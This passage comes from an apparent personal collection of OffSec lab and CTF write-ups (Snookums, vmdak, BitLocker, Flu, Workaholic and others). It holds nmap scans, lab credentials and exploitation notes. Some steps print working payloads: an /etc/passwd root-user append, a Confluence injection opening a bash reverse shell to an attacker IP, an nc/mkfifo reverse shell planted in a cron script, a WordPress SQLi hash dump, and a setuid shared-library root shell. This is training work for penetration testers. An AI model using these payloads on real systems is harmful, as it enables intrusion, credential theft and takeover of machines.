Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 4 | vsFTPd 3.0.2 - secure, fast, stable |_End of status 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 4a:79:67:12:c7:ec:13:3a:96:bd:d3:b4:7c:f3:95:15 (RSA) | 256 a8:a3:a7:88:cf:37:27:b5:4d:45:13:79:db:d2:ba:cb (ECDSA) |_ 256 f2:07:13:19:1f:29:de:19:48:7c:db:45:99:f9:cd:3e (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16) |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.4.16 |_http-title: Simple PHP Photo Gallery 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind |_ 100000 3,4 111/udp6 rpcbind 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: SAMBA) 445/tcp open netbios-ssn Samba smbd 4.10.4 (workgroup: SAMBA) 3306/tcp open mysql MySQL (unauthorized) 33060/tcp open mysqlx MySQL X protocol listener Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # https://github.com/beauknowstech/SimplePHPGal-RCE.py/blob/main/SimplePHPGal-RCE.py\nMalapropDoffUtilize1337\njosh VFc5aWFXeHBlbVZJYVhOelUyVmxaSFJwYldVM05EYz0=\nmichael U0c5amExTjVaRzVsZVVObGNuUnBabmt4TWpNPQ==\nserena VDNabGNtRnNiRU55WlhOMFRHVmhiakF3TUE9PQ==\nMobilizeHissSeedtime747 HockSydneyCertify123 OverallCrestLean000\nAfter SSH into michael we can see that /etc/passwd is writable by us.\nLet's generate a password:\nopenssl passwd -1 -salt password password\n$1$password$Da2mWXlxe6J7jtww12SNG/\necho \u0026#39;owned:$1$password$Da2mWXlxe6J7jtww12SNG/:0:0:owned:/root:/bin/bash\u0026#39; \u0026gt;\u0026gt; /etc/passwd\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/snookums/","section":"CTF 
Writeups","summary":"","title":"Snookums","type":"ctf-writeups"},{"content":" vmdak # Overview # OS: Linux IP: 192.168.143.103 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access through RCE exploit and then privesc through exposed creds and an exposed Jenkins interface on a local port.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 | ftp-syst: | STAT: | FTP server status: | Connected to 192.168.45.159 | Logged in as ftp | TYPE: ASCII | No session bandwidth limit | Session timeout in seconds is 300 | Control connection is plain text | Data connections will be plain text | At session startup, client count was 2 | vsFTPd 3.0.5 - secure, fast, stable |_End of status | ftp-anon: Anonymous FTP login allowed (FTP code 230) |_-rw-r--r-- 1 0 0 1752 Sep 19 2024 config.xml 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA) |_ 256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519) 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) |_http-server-header: Apache/2.4.58 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works 9443/tcp open ssl/http Apache httpd 2.4.58 ((Ubuntu)) |_http-server-header: Apache/2.4.58 (Ubuntu) | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time | ssl-cert: Subject: commonName=vmdak.local/organizationName=PrisonManagement/stateOrProvinceName=California/countryName=US | Subject Alternative Name: DNS:vmdak.local | Not valid before: 2024-08-20T09:21:33 |_Not valid after: 2025-08-20T09:21:33 |_http-title: Home - Prison Management System Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nPort 9443 # I validated this step using the evidence below before moving forward in the chain.\nFTP # I validated this 
step using the evidence below before moving forward in the chain.\nConnected to 192.168.143.103. 220 (vsFTPd 3.0.5) Name (192.168.143.103:kali): Anonymous 331 Please specify the password. Password: 230 Login successful. Remote system type is UNIX. Using binary mode to transfer files. ftp\u0026gt; ls 229 Entering Extended Passive Mode (|||27358|) 150 Here comes the directory listing. -rw-r--r-- 1 0 0 1752 Sep 19 2024 config.xml 226 Directory send OK. ftp\u0026gt; get config.xml local: config.xml remote: config.xml 229 Entering Extended Passive Mode (|||29902|) 150 Opening BINARY mode data connection for config.xml (1752 bytes). 100% |*************************************************************************************************| 1752 34.09 MiB/s 00:00 ETA 226 Transfer complete. 1752 bytes received in 00:00 (20.56 KiB/s) ftp\u0026gt; config.xml file grabbed\n2.401.2 Exploitation # Was able to bypass the admin login form with sqlimal\nmalcom :: RonnyCache001\nadmin :: admin123\nWow, that was simple: I just changed the content type from php to image/jpeg and was able to upload; then on right-clicking and visiting the image I got the shell.\nCreds worked for vmdak:\nvmdak :: RonnyCache001\nLet's check this site out after port forwarding.\nWe know from before the version of this particular Jenkins instance, and it is vulnerable to path read, so let's try using that.\n","date":"26 March 2026","externalUrl":null,"permalink":"/ctf-writeups/vmdak/","section":"CTF Writeups","summary":"","title":"vmdak","type":"ctf-writeups"},{"content":" BitLocker # Overview # OS: Linux IP: 192.168.143.186 Difficulty: Hard Platform: OffSec OSCP: Yes Lists: N/A Summary # Exposed creds; updated the MySQL DB pass to work with authenticated RCE, and then privesc with creds in a process and then sudo perms over a .py.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; 
protocol 2.0) | ssh-hostkey: | 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA) |_ 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519) 80/tcp open http Apache httpd | http-git: | 192.168.143.186:80/.git/ | Git repository found! | .git/config matched patterns \u0026#39;user\u0026#39; | Repository description: Unnamed repository; edit this file \u0026#39;description\u0026#39; to name the... |_ Last commit message: created .env to store the database configuration |_http-server-header: Apache |_http-title: Did not follow redirect to http://bitforge.lab/ 3306/tcp open mysql MySQL (blocked - too many connection errors) 9000/tcp closed cslistener Aggressive OS guesses: Linux 5.0 - 5.14 (98%), MikroTik RouterO Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nThis tool has RCE if we get creds to authenticate with, hmm.\nGitdump # Repository artifacts here gave practical context that directly helped the next move.\nWe got the MySQL creds: user BitForgeAdmin and password B1tForG3S0ftw4r3S0lutions\nDoesn't work on the portal; let's try MySQL.\nMySQL # OK, I had to refer to a writeup because I got lost after this; we can just change the cred like this\nExploitation # UPDATE planning_user SET password=\u0026#39;df5b909019c9b1659e86e0d6bf8da81d6fa3499e\u0026#39; WHERE user_id=\u0026#39;ADM\u0026#39;; and now we are able to log in with the default admin creds\nDon't know what this is about, but on running pspy we were able to catch jack's password\njack\nj4cKF0rg3@445\n","date":"25 March 2026","externalUrl":null,"permalink":"/ctf-writeups/bitlocker/","section":"CTF Writeups","summary":"","title":"BitLocker","type":"ctf-writeups"},{"content":" Jordak # Overview # OS: Linux IP: 192.168.143.109 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Simple RCE with a public exploit, then privesc with an env variable sudo perm.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords 
Hashes Service Versions Enumeration # Nmap # 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 76:18:f1:19:6b:29:db:da:3d:f6:7b:ab:f4:b5:63:e0 (ECDSA) |_ 256 cb:d8:d6:ef:82:77:8a:25:32:08:dd:91:96:8d:ab:7d (ED25519) 80/tcp open http Apache httpd 2.4.58 ((Ubuntu)) |_http-title: Apache2 Ubuntu Default Page: It works |_http-trane-info: Problem with XML parsing of /evox/about |_http-server-header: Apache/2.4.58 (Ubuntu) | http-robots.txt: 1 disallowed entry |_/ Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Dirbusting # ┌──(kali㉿kali)-[~/Desktop/Boxes/Offsec/jordak] └─$ feroxbuster --url http://192.168.143.109// -x php,html.txt 
http://192.168.143.109/vendor/doctrine/annotations/phpbench.json.dist 200 GET 35l 66w 843c http://192.168.143.109/vendor/symfony/deprecation-contracts/composer.json 200 GET 19l 167w 1065c http://192.168.143.109/vendor/doctrine/annotations/LICENSE 200 GET 26l 163w 1204c http://192.168.143.109/vendor/symfony/deprecation-contracts/README.md 200 GET 17l 32w 1035c http://192.168.143.109/vendor/doctrine/annotations/README.md 200 GET 20l 169w 1081c http://192.168.143.109/vendor/phpseclib/phpseclib/LICENSE 200 GET 13l 49w 818c http://192.168.143.109/vendor/doctrine/annotations/phpstan.neon 200 GET 6l 20w 279c http://192.168.143.109/vendor/phpseclib/phpseclib/AUTHORS 200 GET 8l 26w 339c http://192.168.143.109/vendor/phpseclib/phpseclib/BACKERS.md 200 GET 162l 927w 9158c http://192.168.143.109/vendor/doctrine/annotations/CHANGELOG.md 200 GET 28l 71w 873c http://192.168.143.109/vendor/symfony/polyfill-php72/README.md 200 GET 45l 103w 1520c http://192.168.143.109/vendor/doctrine/annotations/composer.json 200 GET 30l 160w 2332c http://192.168.143.109/vendor/phpoffice/phpspreadsheet/README.md 200 GET 123l 571w 6698c http://192.168.143.109/vendor/maennchen/zipstream-php/README.md 200 GET 75l 185w 2179c http://192.168.143.109/vendor/phpseclib/phpseclib/composer.json 200 GET 89l 227w 2856c http://192.168.143.109/vendor/phpoffice/phpspreadsheet/composer.json 200 GET 21l 169w 1079c http://192.168.143.109/vendor/phpoffice/phpspreadsheet/LICENSE 200 GET 11l 121w 842c http://192.168.143.109/vendor/phpoffice/phpspreadsheet/CONTRIBUTING.md 200 GET 35l 78w 949c http://192.168.143.109/vendor/symfony/polyfill-php72/composer.json 200 GET 55l 115w 1901c http://192.168.143.109/vendor/maennchen/zipstream-php/psalm.xml 200 GET 24l 189w 1265c http://192.168.143.109/vendor/maennchen/zipstream-php/LICENSE 200 GET 19l 167w 1065c http://192.168.143.109/vendor/symfony/polyfill-php72/LICENSE 200 GET 41l 97w 957c http://192.168.143.109/vendor/maennchen/zipstream-php/composer.json 200 GET 17l 21w 439c 
http://192.168.143.109/vendor/maennchen/zipstream-php/phpunit.xml.dist 200 GET 37l 84w 1046c http://192.168.143.109/vendor/symfony/polyfill-php70/composer.json 200 GET 51l 239w 1539c http://192.168.143.109/vendor/maennchen/zipstream-php/CHANGELOG.md 200 GET 34l 116w 1252c http://192.168.143.109/vendor/onelogin/php-saml/composer.json 200 GET 19l 167w 1065c http://192.168.143.109/vendor/symfony/polyfill-php70/LICENSE 200 GET 85l 259w 2488c http://192.168.143.109/vendor/robrichards/xmlseclibs/README.md 200 GET 23l 167w 1064c http://192.168.143.109/vendor/onelogin/php-saml/LICENSE 200 GET 18l 35w 737c http://192.168.143.109/vendor/onelogin/php-saml/phpunit.xml 200 GET 19l 61w 409c http://192.168.143.109/vendor/sabre/uri/ChangeLog.md 200 GET 228l 1107w 7617c http://192.168.143.109/vendor/robrichards/xmlseclibs/CHANGELOG.txt 200 GET 41l 78w 935c http://192.168.143.109/vendor/sabre/uri/composer.json 200 GET 33l 60w 755c http://192.168.143.109/vendor/symfony/finder/composer.json 200 GET 27l 222w 1569c http://192.168.143.109/vendor/sabre/uri/LICENSE 200 GET 31l 224w 1538c http://192.168.143.109/vendor/robrichards/xmlseclibs/LICENSE 200 GET 19l 167w 1065c http://192.168.143.109/vendor/symfony/finder/LICENSE 200 GET 79l 254w 1961c http://192.168.143.109/vendor/symfony/finder/CHANGELOG.md 200 GET 587l 3908w 37934c http://192.168.143.109/vendor/phpoffice/phpspreadsheet/CHANGELOG.md 200 GET 14l 33w 500c http://192.168.143.109/vendor/symfony/finder/README.md 200 GET 3l 10w 108c http://192.168.143.109/vendor/zircote/swagger-php/Changelog.md 200 GET 296l 2039w 15276c http://192.168.143.109/vendor/onelogin/php-saml/CHANGELOG 200 GET 126l 334w 3499c http://192.168.143.109/vendor/zircote/swagger-php/README.md 200 GET 72l 154w 1668c http://192.168.143.109/vendor/zircote/swagger-php/composer.json 200 GET 10l 13w 336c http://192.168.143.109/vendor/zircote/swagger-php/phpunit.xml.dist 200 GET 202l 1581w 11358c http://192.168.143.109/vendor/zircote/swagger-php/LICENSE-2.0.txt 200 GET 25l 
59w 700c http://192.168.143.109/vendor/sabre/xml/README.md 200 GET 53l 133w 1406c http://192.168.143.109/vendor/sabre/xml/composer.json 200 GET 13l 29w 457c http://192.168.143.109/vendor/symfony/yaml/README.md 200 GET 27l 222w 1569c http://192.168.143.109/vendor/sabre/xml/LICENSE 200 GET 234l 991w 7102c http://192.168.143.109/vendor/sabre/xml/CHANGELOG.md 200 GET 19l 167w 1065c http://192.168.143.109/vendor/symfony/yaml/LICENSE 200 GET 1539l 8774w 63843c http://192.168.143.109/vendor/onelogin/php-saml/README.md 200 GET 47l 90w 1122c http://192.168.143.109/vendor/symfony/yaml/composer.json 404 GET 9l 31w 277c http://192.168.143.109/js2 404 GET 9l 31w 277c http://192.168.143.109/js2.php 404 GET 9l 31w 277c http://192.168.143.109/js2.html.txt 404 GET 9l 31w 277c http://192.168.143.109/css2 404 GET 9l 31w 277c http://192.168.143.109/css2.php 404 GET 9l 31w 277c http://192.168.143.109/css2.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jslib 404 GET 9l 31w 277c http://192.168.143.109/jslib.php 404 GET 9l 31w 277c http://192.168.143.109/jslib.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jsfiles 404 GET 9l 31w 277c http://192.168.143.109/jsky 404 GET 9l 31w 277c http://192.168.143.109/jsfiles.php 404 GET 9l 31w 277c http://192.168.143.109/jsky.php 404 GET 9l 31w 277c http://192.168.143.109/jsky.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jsfiles.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jss 404 GET 9l 31w 277c http://192.168.143.109/jss.php 404 GET 9l 31w 277c http://192.168.143.109/jss.html.txt 404 GET 9l 31w 277c http://192.168.143.109/jscalendar 404 GET 9l 31w 277c http://192.168.143.109/jscalendar.php 404 GET 9l 31w 277c http://192.168.143.109/jscalendar.html.txt 200 GET 661l 5535w 35181c http://192.168.143.109/LICENSE 200 GET 58l 247w 2930c http://192.168.143.109/testldap.php 200 GET 31l 55w 906c http://192.168.143.109/testapi.php 200 GET 135l 652w 6983c http://192.168.143.109/testoauth2.php 200 GET 57l 227w 3001c 
Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nWe found this from dirbusting.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nPrivESC # Local enumeration exposed the misconfiguration, and the escalation path below was enough to move up.\nBoom, we're root.\n","date":"25 March 2026","externalUrl":null,"permalink":"/ctf-writeups/jordak/","section":"CTF Writeups","summary":"","title":"Jordak","type":"ctf-writeups"},{"content":" Plum # Overview # OS: Linux IP: 192.168.143.28 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE and a simple exposed cred for privesc.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # 22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0) | ssh-hostkey: | 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA) | 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA) |_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519) 80/tcp open http Apache httpd 2.4.56 ((Debian)) |_http-title: PluXml - Blog or CMS, XML powered ! 
|_http-server-header: Apache/2.4.56 (Debian) Device type: general purpose Running: Linux 5.X Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nadmin:admin worked\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nhttps://github.com/MoritzHuppert/CVE-2022-25018/blob/main/CVE-2022-25018.pdf\n","date":"24 March 2026","externalUrl":null,"permalink":"/ctf-writeups/plum/","section":"CTF Writeups","summary":"","title":"Plum","type":"ctf-writeups"},{"content":" SPX # Overview # OS: Linux IP: 192.168.143.108 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE through SPX version and key leaked in phpinfo, privesc with sudo perms over make.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.10 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 80/tcp open http Apache httpd 2.4.52 ((Ubuntu)) |_http-server-header: Apache/2.4.52 (Ubuntu) |_http-title: Tiny File Manager Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose|router Running (JUST GUESSING): Linux 4.X|5.X|2.6.X|3.X (97%), MikroTik RouterOS 7.X (97%) OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:6.0 Aggressive OS guesses: Linux 4.15 - 5.19 (97%), Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (97%), Linux 2.6.32 - 3.13 (91%), Linux 3.10 - 4.11 (91%), Linux 3.2 - 4.14 (91%), Linux 3.4 - 3.10 (91%), Linux 4.15 (91%), Linux 2.6.32 - 3.10 (91%), Linux 4.19 - 5.15 
(91%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirbusting # Port 80 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # After replacing the key with the value from phpinfo, we are able to access it.\nLet's check index.php, where we get 2 hashes; cracking them gives us\nprofiler user\nlowprofile admin\nand now we are able to get in.\nLet's change index to our phpmonkey.\nWe switch into the profiler user with the password lowprofile.\n","date":"24 March 2026","externalUrl":null,"permalink":"/ctf-writeups/spx/","section":"CTF Writeups","summary":"","title":"SPX","type":"ctf-writeups"},{"content":" Flu # Overview # OS: Linux IP: 192.168.197.41 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Easy RCE, then PrivESC with a cronjob.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Nmap was my starting point here, and the service/version clues below shaped the next checks.\nPORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 9.0p1 Ubuntu 1ubuntu8.5 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 02:79:64:84:da:12:97:23:77:8a:3a:60:20:96:ee:cf (ECDSA) |_ 256 dd:49:a3:89:d7:57:ca:92:f0:6c:fe:59:a6:24:cc:87 (ED25519) 8090/tcp open http Apache Tomcat (language: en) |_http-trane-info: Problem with XML parsing of /evox/about | http-title: Log In - Confluence |_Requested resource was /login.action?os_destination=%2Findex.action\u0026amp;permissionViolation=true 8091/tcp open jamlink? 
| fingerprint-strings: | FourOhFourRequest: | HTTP/1.1 204 No Content | Server: Aleph/0.4.6 | Date: Mon, 23 Mar 2026 12:13:01 GMT | Connection: Close | GetRequest: | HTTP/1.1 204 No Content | Server: Aleph/0.4.6 | Date: Mon, 23 Mar 2026 12:12:29 GMT | Connection: Close | HTTPOptions: | HTTP/1.1 200 OK | Access-Control-Allow-Origin: * | Access-Control-Max-Age: 31536000 | Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST | Server: Aleph/0.4.6 | Date: Mon, 23 Mar 2026 12:12:30 GMT | Connection: Close | content-length: 0 | Help, Kerberos, LDAPSearchReq, LPDString, SSLSessionReq, TLSSessionReq, TerminalServerCookie: | HTTP/1.1 414 Request-URI Too Long | text is empty (possibly HTTP/0.9) | RTSPRequest: | HTTP/1.1 200 OK | Access-Control-Allow-Origin: * | Access-Control-Max-Age: 31536000 | Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST | Server: Aleph/0.4.6 | Date: Mon, 23 Mar 2026 12:12:30 GMT | Connection: Keep-Alive | content-length: 0 | SIPOptions: | HTTP/1.1 200 OK | Access-Control-Allow-Origin: * | Access-Control-Max-Age: 31536000 | Access-Control-Allow-Methods: OPTIONS, GET, PUT, POST | Server: Aleph/0.4.6 | Date: Mon, 23 Mar 2026 12:13:07 GMT | Connection: Keep-Alive |_ content-length: 0 1 service unrecognized despite returning data. 
If you know the service/version, please submit the following fingerpri Dirbusting # Port 8090 # Web behavior was the main signal here, so I traced each response change before exploitation.\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\nLet's send this:\ncurl -v http://192.168.197.41:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.45.159/4444%200%3E%261%27%29.start%28%29%22%29%7D/ PrivESC # confluence ; HolingOn12\n/opt/atlassian/confluence/conf/server.xml\nNot getting anywhere with this; let's check the crontab.\nWe know there is a cronjob running.\nLet's get pspy on and check it out.\nWe notice this running with pspy every minute.\nHmm, so it's running log-backup.sh\nand then doing the whole tar thing.\nLet's call it a day with this:\necho \u0026#39;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2\u0026gt;\u0026amp;1|nc 192.168.45.240 3306 \u0026gt;/tmp/f\u0026#39; \u0026gt; log-backup.sh ","date":"23 March 2026","externalUrl":null,"permalink":"/ctf-writeups/flu/","section":"CTF Writeups","summary":"","title":"Flu","type":"ctf-writeups"},{"content":" PyLoader # Overview # OS: Linux IP: 192.168.143.26 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Direct root through an exploit.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 9666/tcp open http CherryPy wsgiserver | http-title: Login - pyLoad |_Requested resource was /login?next=http://192.168.143.26:9666/ | http-robots.txt: 1 disallowed entry |_/ |_http-server-header: 
Cheroot/8.6.0 Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Dirbusting # Port 9666 # I validated this step using the evidence below before moving forward in the chain.\nDefault creds:\npyload:pyload\nExploitation # Once the primitive was confirmed, I converted it into a stable foothold and chained it forward.\n0.5.0\nhttps://www.exploit-db.com/exploits/51532\nhttps://github.com/advisories/GHSA-3f7w-p8vr-4v5f\nAnd boom, root. So easy.\n","date":"23 March 2026","externalUrl":null,"permalink":"/ctf-writeups/pyloader/","section":"CTF Writeups","summary":"","title":"PyLoader","type":"ctf-writeups"},{"content":" Workaholic # Overview # OS: Linux IP: 192.168.197.229 Difficulty: Intermediate Platform: OffSec OSCP: Yes Lists: N/A Summary # Initial access with a WordPress plugin SQLi, then privesc with a SUID binary that needed compiling a library with a plugin.\nLoot # Loot Category Details Usernames Passwords Usernames+Passwords Hashes Service Versions Enumeration # Nmap # Not shown: 65505 filtered tcp ports (no-response), 27 closed tcp ports (reset) PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.5 22/tcp open ssh OpenSSH 9.6p1 Ubuntu 3ubuntu13.9 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 f2:5a:a9:66:65:3e:d0:b8:9d:a5:16:8c:e8:16:37:e2 (ECDSA) |_ 256 9b:2d:1d:f8:13:74:ce:96:82:4e:19:35:f9:7e:1b:68 (ED25519) 80/tcp open http nginx 1.24.0 (Ubuntu) |_http-title: Workaholic **|_http-generator: WordPress 6.7.2** |_http-server-header: nginx/1.24.0 (Ubuntu) |_http-trane-info: Problem with XML parsing of /evox/about Aggressive OS guesses: Linux 5.0 - 5.14 (97%), MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) (96%), Linux 4.15 - 5.19 (94%), Linux 2.6.32 - 3.13 (93%), OpenWrt 22.03 (Linux 5.10) (92%), Linux 
3.10 - 4.11 (91%), Linux 5.0 (91%), Linux 3.2 - 4.14 (90%), Linux 2.6.32 - 3.10 (89%), MikroTik RouterOS 6.36 - 6.48 (Linux 3.3.5) (89%) No exact OS matches for host (test conditions non-ideal). Network Distance: 4 hops Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel WPscan # I validated this step using the evidence below before moving forward in the chain.\nExploitation # Apparently this site had a very old plugin called Advanced Search which is vulnerable to SQLi.\nLet's retrieve the users' hashes:\nhttp://workaholic.offsec/wp-content/plugins/wp-advanced-search/class.inc/autocompletion/autocompletion-PHP5.5.php?q=admin\u0026amp;t=wp_users%20UNION%20SELECT%20user_pass%20FROM%20wp_users--\u0026amp;f=user_login\u0026amp;type=\u0026amp;e admin $P$BDJMoAKLzyLPtatN/WQrbPgHVMmNFn. okadamat17\ncharlie $P$Bd.FfZuysLq8evJ/C6xxWtSB1Ne00p. chrish20\nted $P$BT6Spj.qANCaKd4WR1JGMnC4X.1Kuy/\nWe got in with the creds ted:okadamat17\nwpadmin\nrU)tJnTw5*ShDt4nOx\nAnd boom, we are able to use it to SSH in as charlie.\nThis has SUID set.\nIt's looking for libsecurity.so, and in it it's looking for init_plugin.\nSo let's create that with a rev shell and have it run:\ncat \u0026gt; /home/ted/.lib/libsecurity.c \u0026lt;\u0026lt; \u0026#39;EOF\u0026#39; #include \u0026lt;stdlib.h\u0026gt; #include \u0026lt;unistd.h\u0026gt; void init_plugin() { setuid(0); setgid(0); system(\u0026#34;cp /bin/bash /tmp/bash \u0026amp;\u0026amp; chmod +s /tmp/bash \u0026amp;\u0026amp; /tmp/bash -p\u0026#34;); } EOF Then let's compile with\ngcc -fPIC -shared -o /home/ted/.lib/libsecurity.so /home/ted/.lib/libsecurity.c ","date":"23 March 2026","externalUrl":null,"permalink":"/ctf-writeups/workaholic/","section":"CTF Writeups","summary":"","title":"Workaholic","type":"ctf-writeups"},{"content":" RubyDome # Overview # OS: Linux IP: 192.168.243.22 Difficulty: Easy Platform: OffSec OSCP: Yes Lists: N/A Summary # RCE and then privesc with sudo -l.\nLoot # Loot Category Details Usernames Passwords 
Usernames+Passwords Hashes Service Versions Enumeration # Nmap # nmap 192.168.243.22 -sCV -Pn -p- -A --min-rate=20000 Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-22 10:01 EDT Nmap scan report for 192.168.243.22 Host is up (0.079s latency). Not shown: 65533 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.1 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 256 b9:bc:8f:01:3f:85:5d:f9:5c:d9:fb:b6:15:a0:1e:74 (ECDSA) |_ 256 53:d9:7f:3d:22:8a:fd:57:98:fe:6b:1a:4c:ac:79:67 (ED25519) 3000/tcp open http WEBrick httpd 1.7.0 (Ruby 3.0.2 (2021-07-07)) |_http-title: RubyDome HTML to PDF |_http-server-header: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07) Device type: general purpose|router Running: Linux 5.X, MikroTik RouterOS 7.X OS CPE: cpe:/o:linux:linux_kernel:5 cpe:/o:mikrotik:routeros:7 cpe:/o:linux:linux_kernel:5.6.3 OS details: Linux 5.0 - 5.14, MikroTik RouterOS 7.2 - 7.5 (Linux 5.6.3) Network Distance: 4 hops Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel TRACEROUTE (using port 554/tcp) HOP RTT ADDRESS 1 78.49 ms 192.168.45.1 2 78.43 ms 192.168.45.254 3 78.69 ms 192.168.251.1 4 78.82 ms 192.168.243.22 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . 
